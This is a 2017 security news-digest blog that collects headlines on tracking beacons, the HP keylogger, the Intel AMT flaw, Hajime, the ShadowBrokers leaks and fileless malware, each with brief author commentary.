Stealth tracking, double-agents, and de-bugging gone horribly wrong

Ultrasonic Beacons Are Tracking Your Every Movement
More than 200 Android mobile applications listen surreptitiously for ultrasonic beacons embedded in audio that are used to track users and serve them with targeted advertising. | threatpost.com

[Comment]. SilverPush continues to be installed in apps with millions of downloads. What is most worrisome is that the google requires that developers “disclose how an app collects, uses and shares user data, including the types of parties with whom it’s shared.” Want a more in-depth view? The research paper is available.

‘Crazy bad’ bug in Microsoft’s Windows malware scanner can be used to install malware
Critical update for security engine rushed out the door. | the register.co.uk

[Comment] Say it isn’t so – if Microsoft’s Malware Protection Engine scans a specially crafted file it can allow remote code execution (ironic). Thankfully, Microsoft moved quickly on this with an emergency update. Another ‘win’ for Project Zero.

Beware! Built-in Keylogger Discovered In Several HP Laptop Models
Security researchers discover built-in keylogger in the Conexant High-Definition pre-installed on several Hewlett-Packard (HP) laptop models. | thehackernews.com

[Comment] Why does an audio driver need a key logger? Key strokes recorded and left in cleartext in a file on the device? It smacks of pre-installed spyware.
Posted in Uncategorized | Leave a comment

EPT, Chipsets, and Reroutes

In Defense of Offensive Hacking Tools
8 points in defence of offence. | medium.com

[Comment] The cyber threat landscape has become blurred and is outpacing our ability to adequately quantify the threat. The new reality we currently face is that sophisticated attack tools, exploits, and vulnerability knowledge are all becoming democratized. Let’s call the the Effective Persistent Threat (EPT).

The hijacking flaw that lurked in Intel chips is worse than anyone thought
Patch for severe authentication bypass bug won’t be available until next week. | arstechnia.com

[Comment] Shodan searches show that the number of Internet facing systems with the bug are limited in comparison with the sheer number of devices with this chipset – so it could be much worse. We do need to ask ourselves how something so fundamental in our computing devices could contain such a flaw for so long.

Russian-controlled telecom hijacks financial services’ Internet traffic
Visa, MasterCard, and Symantec among dozens affected by “suspicious” BGP mishap.  | arstechnia.com

[Comment] BGP essential to the Internet but never designed with security in mind. Where have I heard that before. Financial institutions …. sure we have SSL, no problem. How many password resets were done during those seven minutes?
Posted in Musings | Leave a comment

Elections, Geo-aware malware, and SS7 vs. 2FA

Hackers emit 9GB of stolen Macron ’emails’ two days before French presidential election Hmm, who could possibly do such a thing? | theregister.co.uk

‘Fatboy’ Ransomware Extorts Money Based on Victims’ Countries
Cybersecurity researchers have discovered a new variant of ransomware that automatically adjusts its ransom demand from victims based on their location. Targets in wealthier countries will be forced to pay…  | lifars.com

After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts O2 confirms online thefts using stolen 2FA SMS codes. | theregister.co.uk

Posted in Musings | Tagged | Leave a comment

May 5th, 2017 | The 3Ps: Phishing, Patching, and Passwords

Phishing – Google Docs and New Tactics

Patching – Intel

Passwords – World Password Day + Timely Guidance from NIST

Posted in Uncategorized | Leave a comment

May 1, 2017 | Threat Reports

DBIR 2017:

Highlights include:

  • 88% of breaches fall into the nine patterns we first identified back in 2014.
  • 95% of phishing attacks that led to a breach were followed by some sort of software installation.
  • In the 2014 DBIR, ransomware was the 22nd most common form of malware. This year it’s number five, and the most common in the Crimeware pattern.

FireEye M-trends:

Highlights include:

  • The global median time from compromise to discovery has dropped significantly from 146 days in 2015 to 99 days 2016.
  • Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two.
[Comment] Trends and more trends – I am a big fan of Verizon’s DBIR reports.

Posted in Uncategorized | Leave a comment

April 29, 2017 | Vigilantes, Disclosure fall-out, and Malware Upgrades

Vigilantes – Hajime

Hajime IoT worm fights the Mirai botnet for control of easy-to-hack IoT products. Hajime, like Mirai before it, takes advantage of factory-set (default) username and password combinations to brute-force its way into unsecured devices with open Telnet ports. Analysis from Rapidity Networks is found here.

Related posts.

  • Mirai and Hajime Locked Into IoT Botnet Battle. threatpost
  • Hajime, the mysterious evolving botnet. SecureList
  • Hajime Botnet is Now 300,000-Strong. infosecurity-magazine
  • Hajime Botnet Reaches 300,000 Hosts With No Malicious Functions. darknet
  • A vigilante is putting a huge amount of work into infecting IoT devices. arstechnica
[Comment] We need to ask ourselves: (1) why do we make it so easy for compromises to happen by not bothering to change default passwords/usernames, and (2) telnet! hard-coded passwords! – are you serious, let’s demand more basic security from these IoT products.

Disclosure fall-out – ShadowBrokers

  1. Script kiddie bonanza – exploit code is released and scans show tens of thousands of Windows servers infected with the DoublePulsar kernel exploit.
  2. SWIFT – exploiting global financial messaging, how many service bureaus were compromised?
  3. Microsoft anticipatory patches – how did Microsoft patch so quickly, before the disclosure no less. Did NSA tip Microsoft off on the extent/particulars of the disclosure?
  4. EOL – thousands of vulnerable systems, with no patch available from Microsoft, are now being actively exploited.

Related posts.

  • Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs. thehackernews
  • NSA’S DOUBLEPULSAR Kernel Exploit in use Internet-wide. threatpost
  • Tens of thousands Windows systems implanted with NSA’s DoublePulsar. helpnetsecurity
  • NSA-leaking Shadow Brokers just dumped its most damaging release yet. arstechnia
  • Protecting customers and evaluating risk. Microsoft Technet
  • Microsoft Says It Has Patched Leaked NSA Hacks. Fortune
[Comment] The unintended fallout of this is that a few of these exploits target systems that are EOL. Thus, no patches available. Now you would think that doesn’t matter as – who would still have EOL systems facing the Internet?

Upgrades – Fileless malware

So why is fileless malware so dangerous, and why will it continue to expand for the foreseeable future? In simple terms. It works. Although there are a lot of good malware detection systems that are capable of detecting and controlling fileless malware, most are not.

Related Posts.

  • Hard Target: Fileless Malware. threatpost
  • Why Fileless Malware will Continue Its Rapid Expansion. lastline
  • Will Fileless Malware Push the antivirus Industry into Oblivion? helpnetsecurity
[Comment] Fileless malware is stealthy – techniques such as polymorphism, implanting watchdogs, revoking permissions, are being used in an effort to evade detection. Coupled with leveraging features like Microsoft Windows Management Instrumentation (WMI) and Windows PowerShell in an effort to n=blend into the network noise and compromise endpoints without ever storing a binary on disk, ensuring that attacks remains hard to detect and track.
Posted in Weekly Posts | Comments Off on April 29, 2017 | Vigilantes, Disclosure fall-out, and Malware Upgrades